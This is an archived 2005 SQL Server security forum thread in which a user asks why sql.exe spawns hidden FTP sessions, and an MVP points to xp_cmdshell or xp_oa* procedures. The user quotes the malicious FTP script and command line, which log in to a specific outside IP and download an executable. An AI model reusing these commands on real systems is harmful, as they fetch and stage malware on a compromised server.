Home | Contact Us | FAQ | Search & Site Map | Link to Us
Sign In | Join | Other 45 Sites in Network
Home
Discussion Groups
DB Engine
SQL ServerMSDESQL Server CE
Services
Analysis (Data Mining)Analysis (OLAP)DTSIntegration ServicesNotification ServicesReporting Services
Programming
CLRConnectivitySQLXML
Other Technologies
ClusteringEnglish QueryFull-Text SearchReplicationService Broker
General
Data WarehousingPerformanceSecuritySetupSQL Server ToolsOther SQL Server Topics
DirectoryUser Groups
Related Topics
MS AccessOther DB ProductsMS Server Products.NET DevelopmentVB DevelopmentJava DevelopmentMore Topics ...

SQL Server Forum / General / Security / April 2005

Tip: Looking for answers? Try searching our database.

malicious process...

Thread view: 
Enable EMail Alerts  Start New Thread
Thread rating: 
François G. - 28 Apr 2005 11:53 GMT
Hi,

Since I installed a firewall on my machine, it regularly
detects unexpected ftp sessions.

Thanks to a process explorer, I remarked that ftp is
launched from a (hidden) cmd.exe, itself lauched by
sql.exe (for your info, the ftp command line is : "ftp -n -
s:???.txt" where ???.txt is a textfile in \system32\ ).

What SQL subsystem is able to launch such a process? a
stored procedure? a trigger? (fyi, SQLAgent is not
running). How can I prevent this to occur?

Thank you for your help,

François

Note - contents of the textfile :

open 81.244.183.229 19470  
user itqavjflw itqavjflw  
get SCardClnt.exe  
quit    
Mike Epprecht (SQL MVP) - 28 Apr 2005 12:42 GMT
Hi

xp_cmdshell or xp_oa* are capable of doing this.

Regards
--------------------------------
Mike Epprecht, Microsoft SQL Server MVP
Zurich, Switzerland

MVP Program: http://www.microsoft.com/mvp

Blog: http://www.msmvps.com/epprecht/

> Hi,
>
[quoted text clipped - 20 lines]
> get SCardClnt.exe  
> quit    
 
Sign In
Join
My Latest Posts
My Monitored Threads
My Blog
My Photo Gallery
My Profile
My Homepage

Start New Thread
Enable EMail Alerts
Rate this Thread



©2009 Advenet LLC   Privacy Policy - Terms of Use
This website includes both content owned or controlled by Advenet as well as content owned or controlled by third parties.